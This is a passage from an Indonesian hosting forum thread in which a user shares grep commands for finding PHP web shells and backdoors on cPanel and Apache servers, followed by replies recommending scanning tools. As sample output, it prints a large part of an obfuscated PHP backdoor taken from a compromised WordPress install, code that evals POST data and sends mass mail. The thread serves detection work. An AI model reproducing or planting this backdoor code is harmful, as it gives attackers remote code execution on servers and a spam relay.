deteksi shell/backdoor diserver berbasis whm cpanel dan tanpa whm cpanel

ulajuhda · 12 Sep 2018

assalamualaikum wr.wb

tuan2 saya ijin share untuk postingan pertama saya, disini saya mau share gimana cara deteksi shell/backdoor diserver yg berbasis whm dan tidak berbasis whm

1. server berbasis whm cpanel
karena whm itu standar foldernya rootnya ada di home maka perintah yang di gunakan sebagai berikut

grep "((eval.*(base64_decode|gzinflate))|sh(3(ll|11)))" /home/[a-z]*/public_html -roE --

kebetulan ne ada server client saya, saya coba deteksi ternyata didalamnya ada yg nanem shell/backdoor

outputnya

/home/usernyarahasia/public_html/wp-includes/SimplePie/Net/cf985e1e.php:eval(base64_decode($_POST["\x63od\x65"]));}if(isset($_POST["\x74\x79pe"])&&$_POST["type"]=="\x31"){type1_send();}elseif(isset($_POST["type"])&&$_POST["t\x79\x70e"]=="2"){}elseif(isset($_POST["\x74\x79pe"])){echo$_POST["\x74\x79\x70\x65"];}function type1_send(){$escikxlrj="\x6de\x73\x73\x61\x67\x65\x73";${"GL\x4fB\x41\x4c\x53"}["\x75\x6d\x64gow\x79\x75\x6b\x76x"]="f\x74\x65\x69l";if(!isset($_POST["email\x73"])OR!isset($_POST["t\x68\x65\x6d\x65\x73"])OR!isset($_POST["\x6d\x65\x73\x73a\x67\x65s"])OR!isset($_POST["\x66\x72o\x6ds"])OR!isset($_POST["ma\x69\x6c\x65rs"])){exit();}if(get_magic_quotes_gpc()){$pdniulpzjg="\x70\x6fs\x74";foreach($_POST as${${"\x47LO\x42\x41L\x53"}["\x62\x79\x79p\x63u\x79\x6b"]}=>${$pdniulpzjg}){$nnyfljh="\x70\x6f\x73\x74";$_POST[${${"G\x4c\x4fBAL\x53"}["\x62\x79\x79\x70\x63\x75yk"]}]=stripcslashes(${$nnyfljh});}}${"\x47\x4c\x4fBA\x4c\x53"}["l\x6bl\x72\x6b\x6f\x74\x71"]="e\x6d\x61\x69\x6c\x73";${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x77c\x6f\x71a\x6bs\x6f\x68\x72\x69e"]="fr\x6f\x6d\x73";$vuoyllxk="pa\x73\x73\x65s";$gajjboiolb="\x65m\x61\x69l";${${"GL\x4f\x42\x41LS"}["\x63\x69n\x74\x76g\x63"]}=@unserialize(base64_decode($_POST["e\x6da\x69ls"]));${${"\x47\x4c\x4f\x42A\x4cS"}["\x79\x64\x78ff\x74\x6f"]}=@unserialize(base64_decode($_POST["t\x68\x65\x6d\x65\x73"]));${$escikxlrj}=@unserialize(base64_decode($_POST["m\x65ss\x61\x67\x65s"]));${${"G\x4c\x4f\x42\x41\x4c\x53"}["wco\x71\x61k\x73o\x68r\x69\x65"]}=@unserialize(base64_decode($_POST["\x66\x72o\x6d\x73"]));${${"\x47LO\x42A\x4cS"}["f\x67\x6ei\x77q"]}=@unserialize(base64_decode($_POST["\x6d\x61ile\x72\x73"]));${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x72\x79\x71w\x68\x64\x6co\x6f\x6f\x66"]}=@unserialize(base64_decode($_POST["ali\x61s\x65s"]));${$vuoyllxk}=@unserialize(base64_decode

2. server tanpa berbasis whm cpanel
contoh kedua ini server menggunakan webserver apache, default folder root apache "/var/www/html" maka saya scannya seperti berikut

grep "((eval.*(base64_decode|gzinflate))|sh(3(ll|11)))" /var/www [a-z]*/html -roE --include=*.php*

untuk server yang tanpa whm tinggal disesuaikan aja folder rootnya,

mungkin sekian dulu threat cupu ini. sekian trima kasih

bagio · 12 Sep 2018

Pake immunify360 katanya bisa handle hal2 spt ini.

dhyhost · 12 Sep 2018

pakai bitninja atau immunify360 mayan sih,
sekarang udah bnyk yg disembunyikan dengan rapuh.

ulajuhda · 12 Sep 2018

dhyhost said:
pakai bitninja atau immunify360 mayan sih,
sekarang udah bnyk yg disembunyikan dengan rapuh.

siap master

susan · 13 Sep 2018

pake ini jg cukup ampuh https://malware.expert/malware-scanner-and-removal/

deteksi shell/backdoor diserver berbasis whm cpanel dan tanpa whm cpanel

ulajuhda

Beginner 2.0

bagio

Poster 1.0

dhyhost

Web Hosting Service

ulajuhda

Beginner 2.0

susan

Apprentice 2.0